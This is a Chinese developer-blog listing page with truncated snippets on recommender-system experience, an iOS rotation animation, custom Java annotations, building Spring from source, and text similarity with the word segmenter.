        回想起来,我也做推荐了3年多了,最近公司做了调整招聘了很多算法工程师,以为需要多么高大上的算法才能搭建起来的,从实践中走过来,我只想说【不是这样的】     第一次接触推荐系统是在四年前入职的时候,那时候,机器学习和大数据都是没有的概念,什么大数据处理开源软件根本不存在,我们用多台计算机web程序记录用户行为,用.net的w
  • 不间断旋转的动画 pangyulei 动画
    CABasicAnimation* rotationAnimation; rotationAnimation = [CABasicAnimation animationWithKeyPath:@"transform.rotation.z"]; rotationAnimation.toValue = [NSNumber numberWithFloat: M
  • 自定义annotation sha1064616837 javaenumannotationreflect
    对象有的属性在页面上可编辑,有的属性在页面只可读,以前都是我们在页面上写死的,时间一久有时候会混乱,此处通过自定义annotation在类属性中定义。越来越发现Java的Annotation真心很强大,可以帮我们省去很多代码,让代码看上去简洁。 下面这个例子 主要用到了 1.自定义annotation:@interface,以及几个配合着自定义注解使用的几个注解 2.简单的反射 3.枚举
  • Spring 源码 up2pu spring
    1.Spring源代码 https://github.com/SpringSource/spring-framework/branches/3.2.x 注:兼容svn检出 2.运行脚本 import-into-eclipse.bat 注:需要设置JAVA_HOME为jdk 1.7 build.gradle compileJava { sourceCompatibilit
  • 利用word分词来计算文本相似度 yangshangchuan wordword分词文本相似度余弦相似度简单共有词
    word分词提供了多种文本相似度计算方式: 方式一:余弦相似度,通过计算两个向量的夹角余弦值来评估他们的相似度 实现类:org.apdplat.word.analysis.CosineTextSimilarity 用法如下: String text1 = "我爱购物"; String text2 = "我爱读书"; String text3 =
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他